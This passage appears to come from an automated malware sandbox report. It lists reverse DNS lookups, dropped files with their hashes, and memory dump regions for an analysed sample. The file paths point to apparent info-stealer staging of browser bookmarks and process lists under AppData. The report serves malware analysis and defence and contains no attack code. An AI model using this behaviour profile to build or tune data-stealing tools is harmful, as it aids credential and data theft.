    114.196.67.172.in-addr.arpa
    dns
    73 B
    135 B
    1
    1

    DNS Request

    114.196.67.172.in-addr.arpa

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
    167 B
    1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    183.59.114.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    183.59.114.20.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    73.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    73.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    34.58.20.217.in-addr.arpa
    dns
    71 B
    131 B
    1
    1

    DNS Request

    34.58.20.217.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\0993adca3a05158d4947d12883e78d74\Admin@HVDPCYGS_en-US\Browsers\Firefox\Bookmarks.txt

    Filesize

    105B

    MD5

    2e9d094dda5cdc3ce6519f75943a4ff4

    SHA1

    5d989b4ac8b699781681fe75ed9ef98191a5096c

    SHA256

    c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

    SHA512

    d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

  • C:\Users\Admin\AppData\Local\0993adca3a05158d4947d12883e78d74\Admin@HVDPCYGS_en-US\System\Process.txt

    Filesize

    4KB

    MD5

    33a216dfec0af276a74501bf81d1b4f7

    SHA1

    fe44716fa9ec4765270eb4d5515776868d0fb449

    SHA256

    5eaa02fcd4ec93c607a1c52d424ebcddce0d73ec92f4badde8b82701ba490334

    SHA512

    45de29ffe10ba78839370f13813f7b3abcad0d9ef8823d240ea0dd969152d74422dd44b45c2eead67eaef2b558799b7dabffef5a6efc262d133b92b0e5d4e11c

  • C:\Users\Admin\AppData\Local\655ba9c4db5c8f4c43f1e147b63bcc71\msgid.dat

    Filesize

    1B

    MD5

    cfcd208495d565ef66e7dff9f98764da

    SHA1

    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

    SHA256

    5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

    SHA512

    31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

  • memory/2768-146-0x0000000074A50000-0x0000000075200000-memory.dmp

    Filesize

    7.7MB

  • memory/2768-3-0x00000000058B0000-0x0000000005916000-memory.dmp

    Filesize

    408KB

  • memory/2768-2-0x0000000074A50000-0x0000000075200000-memory.dmp

    Filesize

    7.7MB

  • memory/2768-0-0x0000000074A5E000-0x0000000074A5F000-memory.dmp

    Filesize

    4KB

  • memory/2768-147-0x0000000006460000-0x00000000064F2000-memory.dmp

    Filesize

    584KB

  • memory/2768-148-0x0000000006AB0000-0x0000000007054000-memory.dmp

    Filesize

    5.6MB

  • memory/2768-152-0x0000000006660000-0x000000000666A000-memory.dmp

    Filesize

    40KB

  • memory/2768-1-0x0000000000ED0000-0x0000000000F02000-memory.dmp

    Filesize

    200KB

  • memory/2768-158-0x0000000007300000-0x0000000007312000-memory.dmp

    Filesize

    72KB

  • memory/2768-183-0x0000000074A5E000-0x0000000074A5F000-memory.dmp

    Filesize

    4KB

  • memory/2768-184-0x0000000074A50000-0x0000000075200000-memory.dmp

    Filesize

    7.7MB

  • memory/2768-185-0x0000000074A50000-0x0000000075200000-memory.dmp

    Filesize

    7.7MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.